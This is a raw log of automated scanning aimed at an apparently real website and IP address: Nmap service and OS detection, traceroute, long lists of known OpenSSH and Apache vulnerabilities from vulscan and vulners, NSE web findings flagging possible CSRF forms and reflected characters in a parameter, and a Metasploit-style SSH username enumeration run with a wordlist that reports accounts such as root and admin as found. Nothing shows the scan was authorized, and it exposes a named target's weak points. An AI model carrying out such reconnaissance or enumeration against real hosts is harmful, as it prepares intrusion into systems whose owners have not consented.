| [1026593] OpenSSH Lets Remote Authenticated Users Obtain Potentially Sensitive Information
| [1025739] OpenSSH on FreeBSD Has Buffer Overflow in pam_thread() That Lets Remote Users Execute Arbitrary Code
| [1025482] OpenSSH ssh-keysign Utility Lets Local Users Gain Elevated Privileges
| [1025028] OpenSSH Legacy Certificates May Disclose Stack Contents to Remote Users
| [1022967] OpenSSH on Red Hat Enterprise Linux Lets Remote Authenticated Users Gain Elevated Privileges
| [1021235] OpenSSH CBC Mode Error Handling May Let Certain Remote Users Obtain Plain Text in Certain Cases
| [1020891] OpenSSH on Debian Lets Remote Users Prevent Logins
| [1020730] OpenSSH for Red Hat Enterprise Linux Packages May Have Been Compromised
| [1020537] OpenSSH on HP-UX Lets Local Users Hijack X11 Sessions
| [1019733] OpenSSH Unsafe Default Configuration May Let Local Users Execute Arbitrary Commands
| [1019707] OpenSSH Lets Local Users Hijack Forwarded X Sessions in Certain Cases
| [1017756] Apple OpenSSH Key Generation Process Lets Remote Users Deny Service
| [1017183] OpenSSH Privilege Separation Monitor Validation Error May Cause the Monitor to Fail to Properly Control the Unprivileged Process
| [1016940] OpenSSH Race Condition in Signal Handler Lets Remote Users Deny Service and May Potentially Permit Code Execution
| [1016939] OpenSSH GSSAPI Authentication Abort Error Lets Remote Users Determine Valid Usernames
| [1016931] OpenSSH SSH v1 CRC Attack Detection Implementation Lets Remote Users Deny Service
| [1016672] OpenSSH on Mac OS X Lets Remote Users Deny Service
| [1015706] OpenSSH Interaction With OpenPAM Lets Remote Users Deny Service
| [1015540] OpenSSH scp Double Shell Character Expansion During Local-to-Local Copying May Let Local Users Gain Elevated Privileges in Certain Cases
| [1014845] OpenSSH May Unexpectedly Activate GatewayPorts and Also May Disclose GSSAPI Credentials in Certain Cases
| [1011193] OpenSSH scp Directory Traversal Flaw Lets Remote SSH Servers Overwrite Files in Certain Cases
| [1011143] OpenSSH Default Configuration May Be Unsafe When Used With Anonymous SSH Services
| [1007791] Portable OpenSSH PAM free() Bug May Let Remote Users Execute Root Code
| [1007716] OpenSSH buffer_append_space() and Other Buffer Management Errors May Let Remote Users Execute Arbitrary Code
| [1006926] OpenSSH Host Access Restrictions Can Be Bypassed By Remote Users
| [1006688] OpenSSH Timing Flaw With Pluggable Authentication Modules Can Disclose Valid User Account Names to Remote Users
| [1004818] OpenSSH's Secure Shell (SSH) Implementation Weakness May Disclose User Passwords to Remote Users During Man-in-the-Middle Attacks
| [1004616] OpenSSH Integer Overflow and Buffer Overflow May Allow Remote Users to Gain Root Access to the System
| [1004391] OpenSSH 'BSD_AUTH' Access Control Bug May Allow Unauthorized Remote Users to Authenticated to the System
| [1004115] OpenSSH Buffer Overflow in Kerberos Ticket and AFS Token Processing Lets Local Users Execute Arbitrary Code With Root Level Permissions
| [1003758] OpenSSH Off-by-one 'Channels' Bug May Let Authorized Remote Users Execute Arbitrary Code with Root Privileges
| [1002895] OpenSSH UseLogin Environment Variable Bug Lets Local Users Execute Commands and Gain Root Access
| [1002748] OpenSSH 3.0 Denial of Service Condition May Allow Remote Users to Crash the sshd Daemon and KerberosV Configuration Error May Allow Remote Users to Partially Authenticate When Authentication Should Not Be Permitted
| [1002734] OpenSSH's S/Key Implementation Information Disclosure Flaw Provides Remote Users With Information About Valid User Accounts
| [1002455] OpenSSH May Fail to Properly Restrict IP Addresses in Certain Configurations
| [1002432] OpenSSH's Sftp-server Subsystem Lets Authorized Remote Users with Restricted Keypairs Obtain Additional Access on the Server
| [1001683] OpenSSH Allows Authorized Users to Delete Other User Files Named Cookies
|
| OSVDB - http://www.osvdb.org:
| [92034] GSI-OpenSSH auth-pam.c Memory Management Authentication Bypass
| [90474] Red Hat / Fedora PAM Module for OpenSSH Incorrect error() Function Calling Local Privilege Escalation
| [90007] OpenSSH logingracetime / maxstartup Threshold Connection Saturation Remote DoS
| [81500] OpenSSH gss-serv.c ssh_gssapi_parse_ename Function Field Length Value Parsing Remote DoS
| [78706] OpenSSH auth-options.c sshd auth_parse_options Function authorized_keys Command Option Debug Message Information Disclosure
| [75753] OpenSSH PAM Module Aborted Conversation Local Information Disclosure
| [75249] OpenSSH sftp-glob.c remote_glob Function Glob Expression Parsing Remote DoS
| [75248] OpenSSH sftp.c process_put Function Glob Expression Parsing Remote DoS
| [72183] Portable OpenSSH ssh-keysign ssh-rand-helper Utility File Descriptor Leak Local Information Disclosure
| [70873] OpenSSH Legacy Certificates Stack Memory Disclosure
| [69658] OpenSSH J-PAKE Public Parameter Validation Shared Secret Authentication Bypass
| [67743] Novell NetWare OpenSSH SSHD.NLM Absolute Path Handling Remote Overflow
| [59353] OpenSSH sshd Local TCP Redirection Connection Masking Weakness
| [58495] OpenSSH sshd ChrootDirectory Feature SetUID Hard Link Local Privilege Escalation
| [56921] OpenSSH Unspecified Remote Compromise
| [53021] OpenSSH on ftp.openbsd.org Trojaned Distribution
| [50036] OpenSSH CBC Mode Chosen Ciphertext 32-bit Chunk Plaintext Context Disclosure
| [49386] OpenSSH sshd TCP Connection State Remote Account Enumeration
| [48791] OpenSSH on Debian sshd Crafted Username Arbitrary Remote SELinux Role Access
| [47635] OpenSSH Packages on Red Hat Enterprise Linux Compromised Distribution
| [47227] OpenSSH X11UseLocalhost X11 Forwarding Port Hijacking
| [45873] Cisco WebNS SSHield w/ OpenSSH Crafted Large Packet Remote DoS
| [43911] OpenSSH ~/.ssh/rc ForceCommand Bypass Arbitrary Command Execution
| [43745] OpenSSH X11 Forwarding Local Session Hijacking
| [43371] OpenSSH Trusted X11 Cookie Connection Policy Bypass
| [39214] OpenSSH linux_audit_record_event Crafted Username Audit Log Injection
| [37315] pam_usb OpenSSH Authentication Unspecified Issue
| [34850] OpenSSH on Mac OS X Key Generation Remote Connection DoS
| [34601] OPIE w/ OpenSSH Account Enumeration
| [34600] OpenSSH S/KEY Authentication Account Enumeration
| [32721] OpenSSH Username Password Complexity Account Enumeration
| [30232] OpenSSH Privilege Separation Monitor Weakness
| [29494] OpenSSH packet.c Invalid Protocol Sequence Remote DoS
| [29266] OpenSSH GSSAPI Authentication Abort Username Enumeration
| [29264] OpenSSH Signal Handler Pre-authentication Race Condition Code Execution
| [29152] OpenSSH Identical Block Packet DoS
| [27745] Apple Mac OS X OpenSSH Nonexistent Account Login Enumeration DoS
| [23797] OpenSSH with OpenPAM Connection Saturation Forked Process Saturation DoS
| [22692] OpenSSH scp Command Line Filename Processing Command Injection
| [20216] OpenSSH with KerberosV Remote Authentication Bypass
| [19142] OpenSSH Multiple X11 Channel Forwarding Leaks
| [19141] OpenSSH GSSAPIAuthentication Credential Escalation
| [18236] OpenSSH no pty Command Execution Local PAM Restriction Bypass
| [16567] OpenSSH Privilege Separation LoginGraceTime DoS
| [16039] Solaris 108994 Series Patch OpenSSH LDAP Client Authentication DoS
| [9562] OpenSSH Default Configuration Anon SSH Service Port Bounce Weakness
| [9550] OpenSSH scp Traversal Arbitrary File Overwrite
| [6601] OpenSSH *realloc() Unspecified Memory Errors
| [6245] OpenSSH SKEY/BSD_AUTH Challenge-Response Remote Overflow
| [6073] OpenSSH on FreeBSD libutil Arbitrary File Read
| [6072] OpenSSH PAM Conversation Function Stack Modification
| [6071] OpenSSH SSHv1 PAM Challenge-Response Authentication Privilege Escalation
| [5536] OpenSSH sftp-server Restricted Keypair Restriction Bypass
| [5408] OpenSSH echo simulation Information Disclosure
| [5113] OpenSSH NIS YP Netgroups Authentication Bypass
| [4536] OpenSSH Portable AIX linker Privilege Escalation
| [3938] OpenSSL and OpenSSH /dev/random Check Failure
| [3456] OpenSSH buffer_append_space() Heap Corruption
| [2557] OpenSSH Multiple Buffer Management Multiple Overflows
| [2140] OpenSSH w/ PAM Username Validity Timing Attack
| [2112] OpenSSH Reverse DNS Lookup Bypass
| [2109] OpenSSH sshd Root Login Timing Side-Channel Weakness
| [1853] OpenSSH Symbolic Link 'cookies' File Removal
| [839] OpenSSH PAMAuthenticationViaKbdInt Challenge-Response Remote Overflow
| [781] OpenSSH Kerberos TGT/AFS Token Passing Remote Overflow
| [730] OpenSSH Channel Code Off by One Remote Privilege Escalation
| [688] OpenSSH UseLogin Environment Variable Local Command Execution
| [642] OpenSSH Multiple Key Type ACL Bypass
| [504] OpenSSH SSHv2 Public Key Authentication Bypass
| [341] OpenSSH UseLogin Local Privilege Escalation
|_
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|broadband router|WAP|webcam
Running (JUST GUESSING): Linux 3.X|2.6.X|2.4.X (95%), Asus embedded (94%), AXIS embedded (94%)
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:2.6 cpe:/h:asus:rt-ac66u cpe:/h:asus:rt-n10 cpe:/h:axis:211_network_camera cpe:/o:linux:linux_kernel:2.6.20 cpe:/o:linux:linux_kernel:2.4 cpe:/o:linux:linux_kernel:3.8
Aggressive OS guesses: Linux 3.0 - 3.1 (95%), Linux 2.6.32 - 3.10 (95%), Linux 2.6.32 - 3.9 (95%), Asus RT-AC66U router (Linux 2.6) (94%), Asus RT-N10 router or AXIS 211A Network Camera (Linux 2.6) (94%), Linux 2.6.18 (94%), Asus RT-N16 WAP (Linux 2.6) (94%), Asus RT-N66U WAP (Linux 2.6) (94%), Tomato 1.28 (Linux 2.6.22) (94%), AXIS 211A Network Camera (Linux 2.6.20) (94%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 14 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 22/tcp)
HOP RTT ADDRESS
1 47.91 ms 10.246.204.1
2 48.81 ms vlan102.as02.qc1.ca.m247.com (176.113.74.17)
3 32.87 ms irb-0.agg1.qc1.ca.m247.com (37.120.128.168)
4 31.06 ms te-1-5-2-0.bb1.fra2.de.m247.com (82.102.29.44)
5 36.29 ms te0-7-0-2.rcr21.ymq02.atlas.cogentco.com (38.122.42.161)
6 53.31 ms be2089.ccr21.ymq01.atlas.cogentco.com (154.54.45.113)
7 112.01 ms be3043.ccr22.lpl01.atlas.cogentco.com (154.54.44.165)
8 129.50 ms be2183.ccr42.ams03.atlas.cogentco.com (154.54.58.70)
9 129.52 ms be3457.ccr21.ams04.atlas.cogentco.com (130.117.1.10)
10 129.53 ms worldstream.demarc.cogentco.com (149.11.39.42)
11 129.53 ms 109.236.95.181
12 129.55 ms 190.2.158.155
13 129.56 ms 185.106.120.66
14 112.04 ms latina.petite.guru (185.82.200.52)
#######################################################################################################################################
USER_FILE => /usr/share/brutex/wordlists/simple-users.txt
RHOSTS => www.ygmt.info
RHOST => www.ygmt.info
[*] 185.82.200.52:22 - SSH - Using malformed packet technique
[*] 185.82.200.52:22 - SSH - Starting scan
[+] 185.82.200.52:22 - SSH - User 'admin' found
[+] 185.82.200.52:22 - SSH - User 'administrator' found
[+] 185.82.200.52:22 - SSH - User 'anonymous' found
[+] 185.82.200.52:22 - SSH - User 'backup' found
[+] 185.82.200.52:22 - SSH - User 'bee' found
[+] 185.82.200.52:22 - SSH - User 'ftp' found
[+] 185.82.200.52:22 - SSH - User 'guest' found
[+] 185.82.200.52:22 - SSH - User 'GUEST' found
[+] 185.82.200.52:22 - SSH - User 'info' found
[+] 185.82.200.52:22 - SSH - User 'mail' found
[+] 185.82.200.52:22 - SSH - User 'mailadmin' found
[+] 185.82.200.52:22 - SSH - User 'msfadmin' found
[+] 185.82.200.52:22 - SSH - User 'mysql' found
[+] 185.82.200.52:22 - SSH - User 'nobody' found
[+] 185.82.200.52:22 - SSH - User 'oracle' found
[+] 185.82.200.52:22 - SSH - User 'owaspbwa' found
[+] 185.82.200.52:22 - SSH - User 'postfix' found
[+] 185.82.200.52:22 - SSH - User 'postgres' found
[+] 185.82.200.52:22 - SSH - User 'private' found
[+] 185.82.200.52:22 - SSH - User 'proftpd' found
[+] 185.82.200.52:22 - SSH - User 'public' found
[+] 185.82.200.52:22 - SSH - User 'root' found
[+] 185.82.200.52:22 - SSH - User 'superadmin' found
[+] 185.82.200.52:22 - SSH - User 'support' found
[+] 185.82.200.52:22 - SSH - User 'sys' found
[+] 185.82.200.52:22 - SSH - User 'system' found
[+] 185.82.200.52:22 - SSH - User 'systemadmin' found
[+] 185.82.200.52:22 - SSH - User 'systemadministrator' found
[+] 185.82.200.52:22 - SSH - User 'test' found
[+] 185.82.200.52:22 - SSH - User 'tomcat' found
[+] 185.82.200.52:22 - SSH - User 'user' found
[+] 185.82.200.52:22 - SSH - User 'webmaster' found
[+] 185.82.200.52:22 - SSH - User 'www-data' found
[+] 185.82.200.52:22 - SSH - User 'Fortimanager_Access' found
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
#######################################################################################################################################
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-06 00:24 EDT
NSE: Loaded 164 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 00:24
Completed NSE at 00:24, 0.00s elapsed
Initiating NSE at 00:24
Completed NSE at 00:24, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 00:24
Completed Parallel DNS resolution of 1 host. at 00:24, 0.02s elapsed
Initiating SYN Stealth Scan at 00:24
Scanning www.ygmt.info (185.82.200.52) [1 port]
Discovered open port 80/tcp on 185.82.200.52
Completed SYN Stealth Scan at 00:24, 0.16s elapsed (1 total ports)
Initiating Service scan at 00:24
Scanning 1 service on www.ygmt.info (185.82.200.52)
Completed Service scan at 00:24, 6.25s elapsed (1 service on 1 host)
Initiating OS detection (try #1) against www.ygmt.info (185.82.200.52)
Retrying OS detection (try #2) against www.ygmt.info (185.82.200.52)
Initiating Traceroute at 00:24
Completed Traceroute at 00:24, 0.19s elapsed
Initiating Parallel DNS resolution of 14 hosts. at 00:24
Completed Parallel DNS resolution of 14 hosts. at 00:24, 0.25s elapsed
NSE: Script scanning 185.82.200.52.
Initiating NSE at 00:24
Completed NSE at 00:25, 53.89s elapsed
Initiating NSE at 00:25
Completed NSE at 00:25, 0.56s elapsed
Nmap scan report for www.ygmt.info (185.82.200.52)
Host is up (0.11s latency).
rDNS record for 185.82.200.52: latina.petite.guru

PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.10 ((Debian))
| http-auth-finder:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=www.ygmt.info
| url method
|_ http://www.ygmt.info:80/top50/index.php?a=user_cpl FORM
| http-brute:
|_ Path "/" does not require authentication
|_http-chrono: Request times for /; avg: 516.71ms; min: 448.62ms; max: 638.55ms
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=www.ygmt.info
| Found the following possible CSRF vulnerabilities:
|
| Path: http://www.ygmt.info:80/top50/index.php
| Form id:
| Form action: index.php
|
| Path: http://www.ygmt.info:80/top50/index.php
| Form id:
| Form action: index.php
|
| Path: http://www.ygmt.info:80/top50/index.php?a=user_cpl
| Form id:
| Form action: index.php
|
| Path: http://www.ygmt.info:80/top50/index.php?a=user_cpl
| Form id:
| Form action: index.php
|
| Path: http://www.ygmt.info:80/top50/index.php?a=user_cpl
| Form id:
| Form action: http://www.ygmt.info/top50/index.php?a=user_cpl
|
| Path: http://www.ygmt.info:80/top50/index.php?a=stats&u=9
| Form id:
| Form action: index.php
|
| Path: http://www.ygmt.info:80/top50/index.php?a=stats&u=9
| Form id:
| Form action: index.php
|
| Path: http://www.ygmt.info:80/top50/index.php?method=in&cat=Nonude+Sites&start=1
| Form id:
| Form action: index.php
|
| Path: http://www.ygmt.info:80/top50/index.php?method=in&cat=Nonude+Sites&start=1
| Form id:
| Form action: index.php
|
| Path: http://www.ygmt.info:80/top50/index.php?a=stats&u=33
| Form id:
| Form action: index.php
|
| Path: http://www.ygmt.info:80/top50/index.php?a=stats&u=33
| Form id:
| Form action: index.php
|
| Path: http://www.ygmt.info:80/top50/index.php?cat=Nonude+Sites
| Form id:
| Form action: index.php
|
| Path: http://www.ygmt.info:80/top50/index.php?cat=Nonude+Sites
| Form id:
| Form action: index.php
|
| Path: http://www.ygmt.info:80/top50/index.php?a=stats&u=76
| Form id:
| Form action: index.php
|
| Path: http://www.ygmt.info:80/top50/index.php?a=stats&u=76
| Form id:
| Form action: index.php
|
| Path: http://www.ygmt.info:80/top50/index.php?method=in&cat=Free+Sites&start=1
| Form id:
| Form action: index.php
|
| Path: http://www.ygmt.info:80/top50/index.php?method=in&cat=Free+Sites&start=1
| Form id:
| Form action: index.php
|
| Path: http://www.ygmt.info:80/top50/index.php?a=stats&u=62
| Form id:
| Form action: index.php
|
| Path: http://www.ygmt.info:80/top50/index.php?a=stats&u=62
| Form id:
| Form action: index.php
|
| Path: http://www.ygmt.info:80/top50/index.php?a=stats&u=39
| Form id:
| Form action: index.php
|
| Path: http://www.ygmt.info:80/top50/index.php?a=stats&u=39
| Form id:
| Form action: index.php
|
| Path: http://www.ygmt.info:80/top50/index.php?a=stats&u=15
| Form id:
| Form action: index.php
|
| Path: http://www.ygmt.info:80/top50/index.php?a=stats&u=15
| Form id:
|_ Form action: index.php
|_http-date: Sun, 06 Oct 2019 04:24:48 GMT; -4s from local time.
|_http-devframework: Couldn't determine the underlying framework or CMS. Try increasing 'httpspider.maxpagecount' value to spider more pages.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-drupal-enum: Nothing found amongst the top 100 resources,use --script-args number=<number|all> for deeper analysis)
| http-errors:
| Spidering limited to: maxpagecount=40; withinhost=www.ygmt.info
| Found the following error pages:
|
| Error Code: 400
| http://www.ygmt.info:80
|
| Error Code: 404
| http://www.ygmt.info:80/url;
|
| Error Code: 404
| http://www.ygmt.info:80/android-app:/
|
| Error Code: 404
|_ http://www.ygmt.info:80/top50/index.php?a=join
| http-feed:
| Spidering limited to: maxpagecount=40; withinhost=www.ygmt.info
| Found the following feeds:
|_ RSS (version 2.0): http://www.ygmt.info:80/top50/feed.php
|_http-fetch: Please enter the complete path of the directory to save data in.
| http-headers:
| Date: Sun, 06 Oct 2019 04:24:47 GMT
| Server: Apache/2.4.10 (Debian)
| Last-Modified: Wed, 13 Mar 2019 00:18:15 GMT
| ETag: "a0d-583eebde65fc0"
| Accept-Ranges: bytes
| Content-Length: 2573
| Vary: Accept-Encoding
| Connection: close
| Content-Type: text/html
|
|_ (Request type: HEAD)
|_http-jsonp-detection: Couldn't find any JSONP endpoints.
|_http-litespeed-sourcecode-download: Request with null byte did not work. This web server might not be vulnerable
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-mobileversion-checker: No mobile version detected.
| http-php-version: Logo query returned unknown hash ee8cc4afcc21c18aee24a4fe866484d4
|_Credits query returned unknown hash ee8cc4afcc21c18aee24a4fe866484d4
|_http-security-headers:
|_http-server-header: Apache/2.4.10 (Debian)
| http-sitemap-generator:
| Directory structure:
| /
| Other: 1
| /banner/
| gif: 1
| /bn/
| png: 1
| /top50/
| php: 1
| /top50/css/
| css: 1
| /top50/js/
| js: 1
| Longest directory structure:
| Depth: 2
| Dir: /top50/css/
| Total files found (by extension):
|_ Other: 1; css: 1; gif: 1; js: 1; php: 1; png: 1
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-title: Books, videos, photos, fiction and non-fiction of and about yo...
| http-unsafe-output-escaping:
| Characters [> " '] reflected in parameter cat at http://www.ygmt.info:80/top50/index.php?method=in&cat=Nonude+Sites&start=1
| Characters [> " '] reflected in parameter cat at http://www.ygmt.info:80/top50/index.php?cat=Nonude+Sites
|_ Characters [> " '] reflected in parameter cat at http://www.ygmt.info:80/top50/index.php?method=in&cat=Free+Sites&start=1
| http-vhosts:
|_127 names had status 200
|_http-wordpress-enum: Nothing found amongst the top 100 resources,use --script-args search-limit=<number|all> for deeper analysis)
|_http-wordpress-users: [Error] Wordpress installation was not found. We couldn't find wp-login.php
|_http-xssed: No previously reported XSS vuln.
2998| vulners:
2999| cpe:/a:apache:http_server:2.4.10:
3000| CVE-2017-7679 7.5 https://vulners.com/cve/CVE-2017-7679
3001| CVE-2017-7668 7.5 https://vulners.com/cve/CVE-2017-7668
3002| CVE-2017-3169 7.5 https://vulners.com/cve/CVE-2017-3169
3003| CVE-2017-3167 7.5 https://vulners.com/cve/CVE-2017-3167
3004| CVE-2018-1312 6.8 https://vulners.com/cve/CVE-2018-1312
3005| CVE-2017-15715 6.8 https://vulners.com/cve/CVE-2017-15715
3006| CVE-2017-9788 6.4 https://vulners.com/cve/CVE-2017-9788
3007| CVE-2019-10098 5.8 https://vulners.com/cve/CVE-2019-10098
3008| CVE-2019-0220 5.0 https://vulners.com/cve/CVE-2019-0220
3009| CVE-2018-17199 5.0 https://vulners.com/cve/CVE-2018-17199
3010| CVE-2017-9798 5.0 https://vulners.com/cve/CVE-2017-9798
3011| CVE-2017-15710 5.0 https://vulners.com/cve/CVE-2017-15710
3012| CVE-2016-8743 5.0 https://vulners.com/cve/CVE-2016-8743
3013| CVE-2016-2161 5.0 https://vulners.com/cve/CVE-2016-2161
3014| CVE-2016-0736 5.0 https://vulners.com/cve/CVE-2016-0736
3015| CVE-2014-3583 5.0 https://vulners.com/cve/CVE-2014-3583
3016| CVE-2019-10092 4.3 https://vulners.com/cve/CVE-2019-10092
3017| CVE-2016-4975 4.3 https://vulners.com/cve/CVE-2016-4975
3018| CVE-2015-3185 4.3 https://vulners.com/cve/CVE-2015-3185
3019| CVE-2014-8109 4.3 https://vulners.com/cve/CVE-2014-8109
3020| CVE-2018-1283 3.5 https://vulners.com/cve/CVE-2018-1283
3021|_ CVE-2016-8612 3.3 https://vulners.com/cve/CVE-2016-8612
3022| vulscan: VulDB - https://vuldb.com:
3023| [68575] Apache HTTP Server up to 2.4.10 LuaAuthzProvider mod_lua.c privilege escalation
3024| [68435] Apache HTTP Server 2.4.10 mod_proxy_fcgi.c handle_headers denial of service
3025| [88747] Apache HTTP Server 2.4.17/2.4.18 mod_http2 denial of service
3026| [76731] Apache HTTP Server 2.4.12 ErrorDocument 400 Crash denial of service
3027| [74367] Apache HTTP Server up to 2.4.12 mod_lua lua_request.c wsupgrade denial of service
3028| [13300] Apache HTTP Server 2.4.1/2.4.2 mod_wsgi setuid privilege escalation
3029| [13299] Apache HTTP Server 2.4.1/2.4.2 mod_wsgi Content-Type Header information disclosure
3030|
3031| MITRE CVE - https://cve.mitre.org:
3032| [CVE-2013-2249] mod_session_dbd.c in the mod_session_dbd module in the Apache HTTP Server before 2.4.5 proceeds with save operations for a session without considering the dirty flag and the requirement for a new session ID, which has unspecified impact and remote attack vectors.
3033| [CVE-2012-4558] Multiple cross-site scripting (XSS) vulnerabilities in the balancer_handler function in the manager interface in mod_proxy_balancer.c in the mod_proxy_balancer module in the Apache HTTP Server 2.2.x before 2.2.24-dev and 2.4.x before 2.4.4 allow remote attackers to inject arbitrary web script or HTML via a crafted string.
3034| [CVE-2012-3502] The proxy functionality in (1) mod_proxy_ajp.c in the mod_proxy_ajp module and (2) mod_proxy_http.c in the mod_proxy_http module in the Apache HTTP Server 2.4.x before 2.4.3 does not properly determine the situations that require closing a back-end connection, which allows remote attackers to obtain sensitive information in opportunistic circumstances by reading a response that was intended for a different client.
3035| [CVE-2012-3499] Multiple cross-site scripting (XSS) vulnerabilities in the Apache HTTP Server 2.2.x before 2.2.24-dev and 2.4.x before 2.4.4 allow remote attackers to inject arbitrary web script or HTML via vectors involving hostnames and URIs in the (1) mod_imagemap, (2) mod_info, (3) mod_ldap, (4) mod_proxy_ftp, and (5) mod_status modules.
3036| [CVE-2012-3451] Apache CXF before 2.4.9, 2.5.x before 2.5.5, and 2.6.x before 2.6.2 allows remote attackers to execute unintended web-service operations by sending a header with a SOAP Action String that is inconsistent with the message body.
3037| [CVE-2012-2687] Multiple cross-site scripting (XSS) vulnerabilities in the make_variant_list function in mod_negotiation.c in the mod_negotiation module in the Apache HTTP Server 2.4.x before 2.4.3, when the MultiViews option is enabled, allow remote attackers to inject arbitrary web script or HTML via a crafted filename that is not properly handled during construction of a variant list.
3038| [CVE-2012-2379] Apache CXF 2.4.x before 2.4.8, 2.5.x before 2.5.4, and 2.6.x before 2.6.1, when a Supporting Token specifies a child WS-SecurityPolicy 1.1 or 1.2 policy, does not properly ensure that an XML element is signed or encrypted, which has unspecified impact and attack vectors.
3039| [CVE-2012-2378] Apache CXF 2.4.5 through 2.4.7, 2.5.1 through 2.5.3, and 2.6.x before 2.6.1, does not properly enforce child policies of a WS-SecurityPolicy 1.1 SupportingToken policy on the client side, which allows remote attackers to bypass the (1) AlgorithmSuite, (2) SignedParts, (3) SignedElements, (4) EncryptedParts, and (5) EncryptedElements policies.
3040| [CVE-2012-0883] envvars (aka envvars-std) in the Apache HTTP Server before 2.4.2 places a zero-length directory name in the LD_LIBRARY_PATH, which allows local users to gain privileges via a Trojan horse DSO in the current working directory during execution of apachectl.
3041| [CVE-2011-2516] Off-by-one error in the XML signature feature in Apache XML Security for C++ 1.6.0, as used in Shibboleth before 2.4.3 and possibly other products, allows remote attackers to cause a denial of service (crash) via a signature using a large RSA key, which triggers a buffer overflow.
3042|
3043| SecurityFocus - https://www.securityfocus.com/bid/:
3044| [42102] Apache 'mod_proxy_http' 2.2.9 for Unix Timeout Handling Information Disclosure Vulnerability
3045| [27237] Apache HTTP Server 2.2.6, 2.0.61 and 1.3.39 'mod_status' Cross-Site Scripting Vulnerability
3046| [15413] PHP Apache 2 Virtual() Safe_Mode and Open_Basedir Restriction Bypass Vulnerability
3047| [15177] PHP Apache 2 Local Denial of Service Vulnerability
3048| [6065] Apache 2 WebDAV CGI POST Request Information Disclosure Vulnerability
3049| [5816] Apache 2 mod_dav Denial Of Service Vulnerability
3050| [5486] Apache 2.0 CGI Path Disclosure Vulnerability
3051| [5485] Apache 2.0 Path Disclosure Vulnerability
3052| [5434] Apache 2.0 Encoded Backslash Directory Traversal Vulnerability
3053| [5256] Apache httpd 2.0 CGI Error Path Disclosure Vulnerability
3054| [4057] Apache 2 for Windows OPTIONS request Path Disclosure Vulnerability
3055| [4056] Apache 2 for Windows php.exe Path Disclosure Vulnerability
3056|
3057| IBM X-Force - https://exchange.xforce.ibmcloud.com:
3058| [75211] Debian GNU/Linux apache 2 cross-site scripting
3059|
3060| Exploit-DB - https://www.exploit-db.com:
3061| [31052] Apache <= 2.2.6 'mod_negotiation' HTML Injection and HTTP Response Splitting Vulnerability
3062| [30901] Apache HTTP Server 2.2.6 Windows Share PHP File Extension Mapping Information Disclosure Vulnerability
3063| [30835] Apache HTTP Server <= 2.2.4 413 Error HTTP Request Method Cross-Site Scripting Weakness
3064| [28424] Apache 2.x HTTP Server Arbitrary HTTP Request Headers Security Weakness
3065| [28365] Apache 2.2.2 CGI Script Source Code Information Disclosure Vulnerability
3066| [27915] Apache James 2.2 SMTP Denial of Service Vulnerability
3067| [27135] Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution
3068| [26710] Apache CXF prior to 2.5.10, 2.6.7 and 2.7.4 - Denial of Service
3069| [24590] Apache 2.0.x mod_ssl Remote Denial of Service Vulnerability
3070| [23581] Apache 2.0.4x mod_perl Module File Descriptor Leakage Vulnerability
3071| [23482] Apache 2.0.4x mod_php Module File Descriptor Leakage Vulnerability (2)
3072| [23481] Apache 2.0.4x mod_php Module File Descriptor Leakage Vulnerability (1)
3073| [23296] Red Hat Apache 2.0.40 Directory Index Default Configuration Error
3074| [23282] apache cocoon 2.14/2.2 - Directory Traversal vulnerability
3075| [22191] Apache Web Server 2.0.x MS-DOS Device Name Denial of Service Vulnerability
3076| [21854] Apache 2.0.39/40 Oversized STDERR Buffer Denial of Service Vulnerability
3077| [21719] Apache 2.0 Path Disclosure Vulnerability
3078| [21697] Apache 2.0 Encoded Backslash Directory Traversal Vulnerability
3079| [20272] Apache 1.2.5/1.3.1,UnityMail 2.0 MIME Header DoS Vulnerability
3080| [19828] Cobalt RaQ 2.0/3.0 Apache .htaccess Disclosure Vulnerability
3081| [18984] Apache Struts <= 2.2.1.1 - Remote Command Execution
3082| [18329] Apache Struts2 <= 2.3.1 - Multiple Vulnerabilities
3083| [17691] Apache Struts < 2.2.0 - Remote Command Execution
3084| [15319] Apache 2.2 (Windows) Local Denial of Service
3085| [14617] Apache JackRabbit 2.0.0 webapp XPath Injection
3086| [11650] Apache 2.2.14 mod_isapi Dangling Pointer Remote SYSTEM Exploit
3087| [8458] Apache Geronimo <= 2.1.3 - Multiple Directory Traversal Vulnerabilities
3088| [5330] Apache 2.0 mod_jk2 2.0.2 - Remote Buffer Overflow Exploit (win32)
3089| [3996] Apache 2.0.58 mod_rewrite Remote Overflow Exploit (win2k3)
3090| [2237] Apache < 1.3.37, 2.0.59, 2.2.3 (mod_rewrite) Remote Overflow PoC
3091| [1056] Apache <= 2.0.49 Arbitrary Long HTTP Headers Denial of Service
3092| [855] Apache <= 2.0.52 HTTP GET request Denial of Service Exploit
3093| [132] Apache 1.3.x - 2.0.48 - mod_userdir Remote Users Disclosure Exploit
3094| [38] Apache <= 2.0.45 APR Remote Exploit -Apache-Knacker.pl
3095| [34] Webfroot Shoutbox < 2.32 (Apache) Remote Exploit
3096| [11] Apache <= 2.0.44 Linux Remote Denial of Service Exploit
3097| [9] Apache HTTP Server 2.x Memory Leak Exploit
3098|
3099| OpenVAS (Nessus) - http://www.openvas.org:
3100| [855524] Solaris Update for Apache 2 120544-14
3101| [855077] Solaris Update for Apache 2 120543-14
3102| [100858] Apache 'mod_proxy_http' 2.2.9 for Unix Timeout Handling Information Disclosure Vulnerability
3103| [72626] Debian Security Advisory DSA 2579-1 (apache2)
3104| [71551] Gentoo Security Advisory GLSA 201206-25 (apache)
3105| [71550] Gentoo Security Advisory GLSA 201206-24 (apache tomcat)
3106| [71485] Debian Security Advisory DSA 2506-1 (libapache-mod-security)
3107| [71256] Debian Security Advisory DSA 2452-1 (apache2)
